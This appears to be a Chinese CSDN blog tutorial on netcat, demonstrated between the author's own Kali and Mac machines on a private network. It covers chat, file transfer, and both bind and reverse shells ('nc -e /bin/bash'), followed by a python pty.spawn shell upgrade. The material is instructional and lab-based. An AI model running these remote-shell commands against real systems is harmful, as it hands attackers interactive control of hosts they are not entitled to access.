使用NC命令反弹Shell

  • nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流
  • 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp
  • -v 参数,详细输出
  • -n参数,netcat不要DNS反向查询IP的域名
  • -z参数,连接成功后立即关闭连接

本文使用两台电脑操作,一台是Kali(192.168.0.23),一台是Mac(192.168.0.24)

使用NC聊天

有些电脑不支持,而且跟机器使用顺序还有关系。
比如我在Kali上(192.168.0.23)输入:

root@kali:~# nc -l 1234

在Mac上(192.168.0.24)输入:

➜  ~ nc 192.168.0.23 1234

结果是无法连接。

然而我调换了顺序之后,就可以连接了,很神奇:
Kali:

root@kali:~# nc 192.168.0.24 1234
asd
dsa


Mac:

➜  ~ nc -l 1234
asd
dsa

使用NC进行文件传输

同样的,先在Mac上输入,回车后等待:

➜  Desktop nc -l 1234 > file
.......

在Kali上输入:

root@kali:~/Desktop# nc 192.168.0.24 1234 < DNS
.........

回到Mac,查看file文件,已经传输过来了:

➜  Desktop cat file
@
*
0
000
001
002

NC反弹shell

  • 目标是将Kali上的Shell弹到Mac上,最终效果是在Mac上使用命令行操作Kali。

正向反弹shell

Kali上输入:

root@kali:~# nc -lvvp 7777 -e /bin/bash
listening on [any] 7777 ...

Mac上输入:

➜  ~ nc 192.168.0.23 7777

回车之后Kali上显示连接成功:

root@kali:~# nc -lvvp 7777 -e /bin/bash
listening on [any] 7777 ...
192.168.0.24: inverse host lookup failed: Unknown host
connect to [192.168.0.23] from (UNKNOWN) [192.168.0.24] 58773

此时Mac上使用ls命令,列出Kali上的文件信息:

➜  ~ nc 192.168.0.23 7777
ls
52.cn_ips.txt
52.com.cn_ips.txt
Desktop
Documents
Downloads
.....

反向反弹shell

首先在Mac上输入:

➜  ~ nc -l 7777

然后再Kali上输入:

root@kali:~# nc -e /bin/bash 192.168.0.24 7777

此时回到Mac,输入ls即可查看Kali上文件目录:

➜  ~ nc -l 7777
ls
52.cn_ips.txt
52.com.cn_ips.txt
Desktop
Documents
Downloads

所以正向弹shell是在靶机上监听端口,然后攻击者链接
反向弹shell是在攻击者电脑上监听端口,然后靶机链接

如果确定靶机上安装了python,即可使用python生成一个标准shell:
nc连接上靶机之后首先输入:

python -c "import pty;pty.spawn('/bin/bash')"

相关推荐
©️2020 CSDN 皮肤主题: 酷酷鲨 设计师:CSDN官方博客 返回首页